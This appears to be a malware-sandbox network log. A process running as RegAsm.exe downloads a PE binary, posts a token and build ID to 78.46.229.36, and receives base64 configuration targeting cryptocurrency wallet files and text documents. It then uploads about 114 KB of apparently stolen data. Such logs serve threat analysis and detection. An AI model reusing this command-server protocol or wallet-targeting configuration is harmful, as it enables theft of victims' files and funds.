2024-03-28 19:35:14 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:13 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-03-28 19:35:14 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-03-28 19:35:14 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-03-28 19:35:14 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-03-28 19:35:14 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-03-28 19:35:14 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49727	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:15 UTC	311	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 1025 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:15 UTC	1025	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------ECBGCGCGIEGCBFHIIEBFCont
2024-03-28 19:35:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:15 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49728	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:16 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:16 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 Data Ascii: ------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------KFCGDBAKKKFBGDHJKFHJCont
2024-03-28 19:35:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:17 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49729	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:17 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:17 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------CGDHIEGCFHCGDGCAECBGCont
2024-03-28 19:35:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:18 UTC	131	IN	Data Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49730	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:18 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:18 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------BFCAAEHJDBKJJKFHJEBKContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------BFCAAEHJDBKJJKFHJEBKContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------BFCAAEHJDBKJJKFHJEBKCont
2024-03-28 19:35:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49731	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:20 UTC	313	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 114545 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:20 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------HCFCAAEBGCAKKFIDBKJJCont
2024-03-28 19:35:20 UTC	16355	OUT	Data Raw: 6d 34 47 46 46 70 41 72 62 65 63 62 6e 64 66 79 35 71 58 56 68 6a 77 68 65 48 31 74 63 2f 2b 4f 69 6f 74 64 30 31 64 58 67 31 4b 77 61 55 78 43 61 33 74 78 76 43 35 78 69 52 7a 30 2f 43 72 4f 75 4a 35 66 68 53 39 6a 7a 6e 62 62 45 5a 39 63 4c 58 75 30 48 48 33 45 74 2b 62 2f 49 38 7a 47 4b 58 76 76 70 79 72 38 6a 78 79 69 69 69 76 74 6a 38 33 43 69 69 69 67 41 72 30 4c 34 61 2f 77 44 48 74 71 50 2b 2f 48 2f 4a 71 38 39 72 30 48 34 62 66 38 65 2b 70 66 37 30 66 38 6d 72 7a 4d 32 2f 33 5a 2b 71 50 59 79 4c 2f 66 46 36 4d 38 36 31 76 78 44 50 71 39 70 70 39 6e 79 6c 72 5a 57 38 63 53 52 35 2b 38 77 55 41 73 66 79 34 39 71 6c 38 50 61 34 39 6a 44 65 61 58 4e 4d 30 64 6a 66 78 6d 4e 32 42 2f 31 54 45 59 44 2f 41 45 37 48 31 46 62 66 2f 43 71 74 63 2f 35 2b 39 Data Ascii: m4GFFpArbecbndfy5qXVhjwheH1tc/+Oiotd01dXg1KwaUxCa3txvC5xiRz0/CrOuJ5fhS9jznbbEZ9cLXu0HH3Et+b/I8zGKXvvpyr8jxyiiivtj83CiiigAr0L4a/wDHtqP+/H/Jq89r0H4bf8e+pf70f8mrzM2/3Z+qPYyL/fF6M861vxDPq9pp9nylrZW8cSR5+8wUAsfy49ql8Pa49jDeaXNM0djfxmN2B/1TEYD/AE7H1Fbf/Cqtc/5+9
2024-03-28 19:35:20 UTC	16355	OUT	Data Raw: 79 4b 70 39 6a 53 4a 35 68 79 30 6f 69 44 48 47 52 46 47 71 4c 2b 43 71 41 42 2b 41 72 50 31 4c 53 35 4c 2b 4b 57 41 54 6d 4f 47 56 34 35 4a 46 41 47 53 79 5a 32 6e 4f 4d 6a 47 34 39 50 57 76 55 78 64 4f 72 55 6f 63 73 4e 4a 61 66 6e 71 65 4c 67 61 74 43 6a 69 65 61 70 72 48 55 64 64 36 78 39 6a 38 4b 50 49 74 6c 44 4a 71 73 4e 31 61 54 79 4c 4e 47 47 4b 72 4b 4a 43 73 52 42 7a 31 56 41 78 48 66 65 50 53 72 52 64 37 4c 78 5a 70 32 6c 77 32 30 4c 78 53 77 33 6c 31 76 75 2f 4b 5a 52 49 49 70 4d 52 45 6b 6c 63 52 4d 75 44 6b 67 62 67 53 52 6a 46 55 42 70 2b 70 4c 66 58 46 36 4e 53 33 33 4e 7a 63 70 64 54 53 53 78 4c 4a 76 6b 54 64 74 62 35 6c 4f 43 4e 78 78 6a 32 39 42 54 59 39 49 75 72 57 4b 4f 4b 31 76 64 71 70 4a 4c 4a 38 38 61 73 51 30 69 65 58 4a 67 6b Data Ascii: yKp9jSJ5hy0oiDHGRFGqL+CqAB+ArP1LS5L+KWATmOGV45JFAGSyZ2nOMjG49PWvUxdOrUocsNJafnqeLgatCjieaprHUdd6x9j8KPItlDJqsN1aTyLNGGKrKJCsRBz1VAxHfePSrRd7LxZp2lw20LxSw3l1vu/KZRIIpMREklcRMuDkgbgSRjFUBp+pLfXF6NS33NzcpdTSSxLJvkTdtb5lOCNxxj29BTY9IurWKOK1vdqpJLJ88asQ0ieXJgk
2024-03-28 19:35:20 UTC	16355	OUT	Data Raw: 58 41 56 33 33 77 35 2f 31 4f 6f 2f 37 30 66 38 6d 72 7a 4d 32 2f 33 5a 2b 71 50 62 79 44 2f 66 46 36 4d 6d 75 66 45 30 50 68 76 77 46 70 55 76 79 76 64 79 32 55 53 77 52 48 75 64 67 35 50 73 50 2f 72 56 64 38 50 2b 4c 37 50 56 66 44 73 6d 6f 33 45 69 51 79 57 71 2f 77 43 6c 4c 2f 64 49 37 6a 32 50 62 38 71 38 55 76 64 51 75 64 51 61 45 33 45 6d 34 51 51 70 42 47 4f 79 6f 6f 77 41 4b 6c 30 6e 55 33 30 79 36 5a 73 46 37 65 5a 44 46 63 52 5a 2f 77 42 5a 47 65 6f 2b 76 63 48 73 51 4b 7a 6c 6c 55 48 54 66 38 31 37 2f 77 44 41 2f 72 71 65 72 44 4e 5a 71 6f 76 35 62 57 2f 34 50 39 64 44 33 43 35 75 34 4c 2b 58 77 2f 64 57 30 67 6b 68 6c 75 79 79 4d 4f 34 2b 7a 7a 56 77 66 6a 50 2f 41 4a 47 71 37 2b 6b 66 2f 6f 43 31 55 38 43 61 70 4d 50 45 46 6a 6f 77 6b 38 32 Data Ascii: XAV33w5/1Oo/70f8mrzM2/3Z+qPbyD/fF6MmufE0PhvwFpUvyvdy2USwRHudg5PsP/rVd8P+L7PVfDsmo3EiQyWq/wClL/dI7j2Pb8q8UvdQudQaE3Em4QQpBGOyoowAKl0nU30y6ZsF7eZDFcRZ/wBZGeo+vcHsQKzllUHTf817/wDA/rqerDNZqov5bW/4P9dD3C5u4L+Xw/dW0gkhluyyMO4+zzVwfjP/AJGq7+kf/oC1U8CapMPEFjowk82
2024-03-28 19:35:20 UTC	16355	OUT	Data Raw: 59 70 63 63 55 75 4b 58 46 4b 34 68 75 4b 4b 64 69 67 43 69 34 58 47 34 70 61 64 6a 48 61 6a 46 4b 34 58 45 41 71 31 59 44 2f 53 66 2b 32 62 35 2f 37 35 4e 56 38 56 61 73 68 2b 2f 50 2f 58 4e 2f 2f 51 54 57 64 54 34 57 53 32 63 46 4a 31 36 39 36 69 4a 39 65 4d 65 6c 53 79 48 35 6a 55 52 4e 65 6c 30 52 33 78 32 47 35 34 79 61 51 2f 68 53 6e 72 53 48 50 70 55 6c 6f 61 65 6c 4a 39 4b 58 76 53 47 6b 79 67 4e 49 61 55 6a 6a 48 36 30 68 36 31 49 78 4b 62 7a 69 6e 48 6b 66 6a 53 5a 77 63 30 68 69 48 6a 76 31 70 70 35 70 78 39 71 61 66 58 33 70 46 49 44 7a 53 48 33 37 55 74 4a 6e 69 67 59 64 65 31 4a 6a 33 35 6f 7a 6d 67 6e 33 70 41 42 4f 52 37 30 6c 4b 63 6d 6b 78 67 30 44 50 51 36 53 6c 6f 72 49 2b 53 45 70 61 4b 4b 41 45 6f 6f 6f 6f 47 46 46 46 46 49 41 6f 6f Data Ascii: YpccUuKXFK4huKKdigCi4XG4padjHajFK4XEAq1YD/Sf+2b5/75NV8Vash+/P/XN//QTWdT4WS2cFJ1696iJ9eMelSyH5jURNel0R3x2G54yaQ/hSnrSHPpUloaelJ9KXvSGkygNIaUjjH60h61IxKbzinHkfjSZwc0hiHjv1pp5px9qafX3pFIDzSH37UtJnigYde1Jj35ozmgn3pABOR70lKcmkxg0DPQ6SlorI+SEpaKKAEooooGFFFFIAoo
2024-03-28 19:35:20 UTC	16355	OUT	Data Raw: 50 79 34 64 78 55 45 35 56 74 7a 48 61 54 67 59 41 34 35 35 34 76 77 42 46 44 2f 61 62 65 2b 6d 68 54 55 58 74 4a 72 32 33 4b 72 44 62 52 42 45 63 54 53 5a 51 67 44 45 6d 54 6c 6c 36 59 7a 58 48 58 78 65 46 6e 47 31 52 58 58 39 49 39 4c 43 35 64 6a 71 63 37 30 58 5a 32 37 39 4e 2f 78 73 62 50 2f 43 58 2b 49 50 38 41 6f 4a 4e 2f 33 35 6a 2f 41 50 69 61 50 2b 45 76 38 51 66 39 42 4a 76 2b 2f 4d 66 2f 41 4d 54 58 4a 4a 71 63 55 58 68 76 54 39 64 75 57 6c 2b 79 58 55 63 75 30 52 34 44 54 79 72 49 36 68 55 79 44 67 62 55 33 4d 53 44 6a 49 37 6b 43 74 57 7a 73 74 52 75 37 7a 54 56 6a 30 37 55 70 4c 4f 36 6a 74 58 65 35 53 32 59 71 50 4d 56 53 35 44 42 64 75 46 79 65 76 54 48 4e 59 52 6c 6c 37 66 77 6e 56 4f 6e 6e 45 4e 35 76 37 2f 6b 62 48 2f 43 58 2b 49 50 2b Data 